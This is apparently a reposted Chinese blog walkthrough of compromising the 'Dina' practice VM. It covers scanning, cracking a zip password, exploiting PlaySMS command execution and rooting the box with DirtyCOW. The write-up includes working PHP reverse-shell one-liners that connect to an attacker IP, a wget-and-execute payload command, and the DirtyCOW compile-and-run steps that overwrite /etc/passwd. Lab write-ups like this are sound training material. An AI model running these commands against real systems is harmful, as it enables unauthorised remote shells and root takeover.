Dina靶机渗透

2023-11-10 08:11
文章标签 渗透 靶机 dina

本文主要是介绍Dina靶机渗透,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

靶机记录--1

目录

主机发现

端口扫描

目录扫描

去web端看看,开始渗透

反弹shell

方法1

方法2

使用msf getshell

提权

尝试1-失败

尝试2-脏牛提权-成功

总结


主机发现

netdiscover -i eth0 -r 192.168.129.0/24

端口扫描

扫描端口的服务版本,服务器操作系统,中间件等信息

目录扫描

去web端看看,开始渗透

看了看页面也没啥有用信息

一个提交信息

只是爆出服务器中间件版本然后也不能操作什么

还有一个链接跳转到了一个印度人的博客里,里面有他的漏洞发现过程,我们不看^-^

来访问一下目录扫描出来的结果

http://192.168.129.201/robots.txt

http://192.168.129.201/secure/

http://192.168.129.201/tmp/

http://192.168.129.201/uploads/

点了下发现点不进去,拖到新页面也没有啥

最后我将那个后缀去掉在访问 直接触发了下载

下来要解压,里面有一个 .mp3文件,但是要解压密码,先放着

robots.txt里的几个也都进去后没发现什么

然后换了个kali2021的dirb

最后发现这里有些信息

好像是什么密码之类的,但是也还没有找到啥子登录框

现在只剩那个下载的加密文件了

刚好这里爆出了几个密码,去试试

freedom password helloworld! diana iloveroot

结果第一个就成功了

编辑打开里面的.mp3 文件,找到了一些内容

访问一下这个url,看名字像是个登陆点

直接跳转过来了

里面那句话,这个人设的密码应该是弱口令

来用.mp3 里的uname登陆下,密码使用那个网页找到的那几个

freedom password helloworld! diana iloveroot

然后使用diana登陆上来了

随便点了几下,发现这里有几个下载

结果啥也不是,浪费流量

然后在这发现了一个上传点

然后上传了一个图片马,不知道上传到哪里了

这时想到了能不能去搜一下这个cms有什么版本漏洞

看见这个 42044 里有远程命令执行漏洞

查看

让插入代码到电话簿里

想到了刚才下的几个空文件,有个phonebook,直接有格式了

直接改它

改好后import进去

同时抓包

在user-agent里执行命令,,命令执行成功

反弹shell

方法1

在kali下做如下准备

<?php $sock=fsockopen("192.168.129.197",4567);exec("/bin/sh -i <&3 >&3 2>&3") ?>

再监听1234

远程执行如下代码

wget 192.168.129.197/shell.txt -O /tmp/shell.php;php /tmp/shell.php

getshell

方法2

php -r '$sock=fsockopen("192.168.129.197",1234);exec("/bin/sh -i &3 2>&3");'

getshell

使用msf getshell

先进来,打开msf

直接search playsms , 找找利用模块

再use使用它,,show options查看要哪些配置 

设置参数,,开始攻击

最后得到一个meteroreter 终端,但是不咋有用,好多命令不能识别

 help一下

shell开一个终端

python再开一个新终端

提权

尝试1-失败

查看内核版本

 搜索操作系统版本漏洞

本地提权

复制到网站根目录

远程下载,编译,执行

结果失败了

尝试2-脏牛提权-成功

下载,编译,执行

wget http://192.168.129.197/dirty.c

gcc -pthread dirty.c -o dirty -lcrypt

./dirty root (root是随便给个密码,一会自己用)

然后登陆自己的用户,此时,这个用户已经是管理员了

用python开一个新窗口

登陆成功,#

看,以前的root已经被覆盖掉了

渗透完成后,要恢复

mv /tmp/passwd.bak /etc/passwd

明显不一样了,,只是前一个用户也叫firefart,,密码恢复为他的了

得到flag

总结

在知道其cms时,,可以去 searchsploit 搜索其版本漏洞

getshell的不同方法 php -r '$sock=fsockopen("192.168.129.197",1234);exec("/bin/sh -i &3 2>&3");'

这篇关于Dina靶机渗透的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/381429

相关文章

【工具分享】针对加解密综合利用后渗透工具 - DecryptTools

下载地址: 链接: https://pan.quark.cn/s/2e451bd65d79 工具介绍 支持22种OA、CMS 加解密+密码查询功能 万户OA用友NC金蝶EAS蓝凌OA致远OA宏景ERP湖南强智金和jc6 瑞友天翼金和C6 Navicat华天动力 FinalShell亿赛通帆软报表H3C CASWeblogic金蝶云星空新华三IMC金盘 OP

内网渗透—横向移动非约束委派约束委派

前言 今天依旧是横向移动的内容,委派主要分为三类非约束委派、约束委派、资源委派。今天主要讲前面两个内容,资源委派留到最后再讲。 实验环境 Web:192.168.145.137,192.168.22.28DC:192.168.22.30 非约束委派 原理 原理很简单,当DC访问具有非约束委派权限的主机A时,会把当前域管理员账户的TGT放在ST票据中,然后一起发给主机A。主机A会把TG

红日靶场----(四)1.后渗透利用阶段

使用Metasploit进入后渗透利用阶段     一旦我们获取了目标主机的访问权限,我们就可以进入后渗透利用阶段,在这个阶段我们收集信息,采取措施维护我们的访问权限,转向其他机器     Step01:上线MSF(通过metasploit获取目标系统的会话-即SHELL) 常用选项-p //指定生成的Payload--list payload //列出所支持的Payload类

【渗透测试专栏】1.2认证和授权类-越权访问(水平/垂直越权)

该系列专栏旨在让漏洞检测变得更简单,只用于学习用途 靶机环境请看专栏前言专栏前言-WooYun漏洞库环境搭建-CSDN博客 目录 该系列专栏旨在让漏洞检测变得更简单,只用于学习用途 一、漏洞描述 1、水平越权 2、垂直越权 二、漏洞级别 三、漏洞检测方法 漏洞修复 一、漏洞描述 偏业务漏洞 1、水平越权 水平越权指的是在同一权限级别下,用户可以访问其他用户的资源或

渗透中的文件上传与下载

有时候拿下一台机器的控制权,需要在这台主机上传一些东西;有时候也会碰到不能直接上传只能通过命令行执行的shell,这就需要将shell下载下来。 目录 利用powershell进行文件上传下载 利用bitsadmin命令进行文件下载 利用certutil命令上传下载文件 利用wget命令上传下载文件 利用powershell进行文件上传下载 # 下载脚本并在内存中执行pow

【网络安全 | 渗透工具】Cencys+Shodan使用教程

原创文章,不得转载。 文章目录 Cencys准备语法全文搜索字段和值搜索通配符搜索布尔逻辑搜索嵌套搜索时间相关搜索范围搜索双引号 (")转义序列和保留字符 Censys 搜索语言中的主机查询查看主机搜索结果Censys 搜索语言中的证书查询查看证书搜索结果生成报告其余 Shodan准备使用语法查看设备详情 Cencys Censys 是一个强大的互联网搜索引擎和数据平台

97.WEB渗透测试-信息收集-Google语法(11)

免责声明:内容仅供学习参考,请合法利用知识,禁止进行违法犯罪活动! 内容参考于: 易锦网校会员专享课 上一个内容:96.WEB渗透测试-信息收集-Google语法(10) 2 、找上传类漏洞地址: • site:xxx.com inurl:file 打开搜索引擎搜索 site:qimai.cn inurl:file 搜索不到就是不存在 • site:xxx.com in

Tomato靶场渗透测试

1.扫描靶机地址 可以使用nmap进行扫描 由于我这已经知道靶机地址 这里就不扫描了 2.打开网站 3.进行目录扫描 dirb    http://172.16.1.113 发现有一个antibot_image目录 4.访问这个目录 可以看到有一个info.php 5.查看页面源代码 可以发现可以进行get传参 6.尝试查看日志文件 http://172.16

tomato靶机通关攻略

主机发现  用kali去扫描端口,发现有3个开放端口 访问网站    在kali里面进行目录扫描,找到一个antibot_image   找到一个/antibot_image/ 目录,进而找到/antibots/目录  发现可能存在文件包含    页面通过image传参查看passwd文件  页面通过image传参查看日志文件   将一句话木马作为ssh登录的用户

渗透测试学习资源

burp学院 https://portswigger.net/burp/documentation/desktop/getting-started https://portswigger.net/web-security/ hacker101学院 https://www.hacker101.com/ https://github.com/bugcrowd/bugcrowd_universit